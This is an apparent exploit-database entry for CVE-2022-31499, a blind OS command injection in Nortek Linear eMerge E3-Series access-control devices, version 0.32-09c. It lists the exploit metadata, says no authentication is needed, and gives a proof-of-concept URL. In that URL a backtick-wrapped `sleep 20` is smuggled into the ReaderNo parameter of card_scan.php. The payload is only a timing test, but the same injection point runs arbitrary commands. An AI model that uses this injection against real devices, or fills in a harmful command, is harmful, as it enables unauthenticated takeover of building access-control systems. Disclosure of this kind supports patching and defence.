Nortek Linear eMerge E3-Series Command Injection

Nortek Linear eMerge E3-Series version 0.32-09c suffers from a blind OS command injection vulnerability.


SHA-256 | 1b6d5355c3cfb8a305b173bd302a4a64ba695c262235e2d26ec6c0d12c984191

# Exploit Title: Nortek Linear eMerge E3-Series - Blind OS Command Injection
# Exploit Author: Omar Hashim
# Version: 0.32-09c
# Vendor home page: https://www.nortekcontrol.com/access-control/
# Vendor home page: https://linear-solutions.com/
# Authentication Required: No
# CVE: CVE-2022-31499

# POC:
====================

http:/<HOST:PORT>/card_scan.php?No=1337&ReaderNo=`sleep
20`&CardFormatNo=1337

Related Posts